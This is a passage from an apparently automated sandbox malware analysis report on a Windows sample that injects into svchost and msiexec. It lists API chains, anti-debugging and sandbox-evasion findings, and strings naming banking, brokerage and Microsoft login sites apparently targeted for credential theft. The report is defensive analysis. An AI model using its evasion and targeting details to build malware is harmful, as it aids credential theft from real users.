            Source: Binary string: svchost.pdbUGP source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000045EC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003B6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: 0XLuA614VK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 0XLuA614VK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 0XLuA614VK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 0XLuA614VK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 0XLuA614VK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F242DE
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F40A76 push ecx; ret 0_2_00F40A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A81A pushfd ; iretd 2_2_0041A81B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160C3 push edx; retf 9A79h2_2_0041611B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418167 push ecx; retf 2_2_00418168
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041699E push esi; retf 2_2_004169A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004249A3 push edi; ret 2_2_004249AE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004149BA push esi; retf 2_2_004149BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A39 push edx; ret 2_2_00417A8A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A8B push edx; ret 2_2_00417A8A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413B88 push ds; iretd 2_2_00413BAE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413B93 push ds; iretd 2_2_00413BAE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413C06 push ds; iretd 2_2_00413BAE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041CCFF push ds; ret 2_2_0041CD20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004034B0 push eax; ret 2_2_004034B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A6DB push eax; retf 2_2_0041A6DD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C7D3 push esp; retf 2_2_0042C85F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_0420D42B push esi; retf 3_2_0420D42C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_0420F40F push esi; retf 3_2_0420F411
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_0421D414 push edi; ret 3_2_0421D41F
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_042104EC push edx; ret 3_2_042104FB
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_0420C5F9 push ds; iretd 3_2_0420C61F
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_0420C604 push ds; iretd 3_2_0420C61F
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_0420C677 push ds; iretd 3_2_0420C61F
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_04215770 push ds; ret 3_2_04215791
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_042178D0 push ds; retf 3_2_042178D9
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_0421314C push eax; retf 3_2_0421314E
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_042179E3 push edi; iretd 3_2_04217A0A
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_0421328B pushfd ; iretd 3_2_0421328C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_04210BD8 push ecx; retf 3_2_04210BD9
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_06A3AE9C pushfd ; iretd 3_2_06A3AE9D
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F3F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F3F98E
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00FB1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00FB1C41
            Source: C:\Users\user\Desktop\0XLuA614VK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98574
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\0XLuA614VK.exeAPI/Special instruction interceptor: Address: 1163214
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160C3 rdtsc 2_2_004160C3
            Source: C:\Users\user\Desktop\0XLuA614VK.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 2.4 %
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe TID: 5884Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe TID: 5884Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe TID: 5884Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe TID: 5884Thread sleep count: 50 > 30Jump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe TID: 5884Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1848Thread sleep count: 4400 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1848Thread sleep time: -8800000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1848Thread sleep count: 5572 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1848Thread sleep time: -11144000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F8DBBE
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F5C2A2 FindFirstFileExW,0_2_00F5C2A2
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F968EE FindFirstFileW,FindClose,0_2_00F968EE
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00F9698F
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F8D076
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F8D3A9
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F99642
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F9979D
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00F99B2B
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F95C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00F95C97
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0012BF20 FindFirstFileW,FindNextFileW,FindClose,4_2_0012BF20
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F242DE
            Source: 049zKJ78K.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 049zKJ78K.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 049zKJ78K.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 049zKJ78K.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 049zKJ78K.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 049zKJ78K.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 049zKJ78K.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 049zKJ78K.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 049zKJ78K.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 049zKJ78K.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: firefox.exe, 00000006.00000002.2497621913.000001F87B5FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII,rP
            Source: 049zKJ78K.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 049zKJ78K.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 049zKJ78K.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 049zKJ78K.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 049zKJ78K.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: 049zKJ78K.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 049zKJ78K.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 049zKJ78K.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 049zKJ78K.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 049zKJ78K.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 049zKJ78K.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 049zKJ78K.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 049zKJ78K.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 049zKJ78K.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 049zKJ78K.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 049zKJ78K.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 049zKJ78K.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4488167215.000000000109F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz0JDY
            Source: 049zKJ78K.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 0XLuA614VK.exe, 00000000.00000002.2047858943.0000000001354000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ewxQemUiEk5ZDVeUr-fg
            Source: 049zKJ78K.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
            Source: 049zKJ78K.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 049zKJ78K.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160C3 rdtsc 2_2_004160C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417993 LdrLoadDll,2_2_00417993
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9EAA2 BlockInput,0_2_00F9EAA2
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F52622
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F242DE
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F44CE8 mov eax, dword ptr fs:[00000030h]0_2_00F44CE8
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_01163480 mov eax, dword ptr fs:[00000030h]0_2_01163480
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_011634E0 mov eax, dword ptr fs:[00000030h]0_2_011634E0
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_01161E70 mov eax, dword ptr fs:[00000030h]0_2_01161E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
